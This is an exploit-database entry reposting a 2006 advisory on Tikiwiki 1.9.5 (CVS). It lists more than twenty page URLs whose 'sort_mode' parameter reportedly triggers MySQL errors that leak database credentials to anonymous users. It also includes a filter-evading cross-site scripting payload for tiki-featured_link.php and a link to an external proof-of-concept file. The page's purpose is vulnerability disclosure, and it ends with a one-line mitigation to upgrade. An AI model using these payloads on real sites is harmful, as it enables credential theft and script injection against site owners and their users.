header-logo
Suggest Exploit
vendor:
Tikiwiki
by:
securfrog
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: Tikiwiki
Affected Version From: 1.9.5 (CVS) -Sirius-
Affected Version To: 1.9.5 (CVS) -Sirius-
Patch Exists: Yes
Related CWE: N/A
CPE: tikiwiki:tikiwiki
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)

An anonymous user can dump the MySQL user & passwd just by creating a MySQL error with the 'sort_mode' var, with the following links: /tiki-listpages.php?offset=0&sort_mode=, /tiki-lastchanges.php?days=1&offset=0&sort_mode=, /messu-archive.php?sort_mode=, /messu-mailbox.php?sort_mode=, /messu-sent.php?sort_mode=, /tiki-directory_add_site.php?sort_mode=, /tiki-directory_ranking.php?sort_mode=, /tiki-directory_search.php?sort_mode=, /tiki-forums.php?sort_mode=, /tiki-view_forum.php?forumId=, /tiki-friends.php?sort_mode=, /tiki-list_blogs.php?sort_mode=, /tiki-list_faqs.php?sort_mode=, /tiki-list_trackers.php?sort_mode=, /tiki-list_users.php?sort_mode=, /tiki-my_tiki.php?sort_mode=, /tiki-notepad_list.php?sort_mode=, /tiki-orphan_pages.php?sort_mode=, /tiki-shoutbox.php?sort_mode=, /tiki-usermenu.php?sort_mode=, /tiki-webmail_contacts.php?sort_mode=. There is also a XSS vulnerability at /tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--

Mitigation:

Upgrade to the latest version of Tikiwiki
Source

Exploit-DB raw data:

/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius-  (PoC)
// Product: Tikiwiki 
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/




there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
a anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=

a proof of concept is disponible here : http://cockor.free.fr/PoC.swf

there's also a xss here :
/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--

regards , securfrog 

# milw0rm.com [2006-11-01]

Navigation

Suggest Exploit

Services By CQR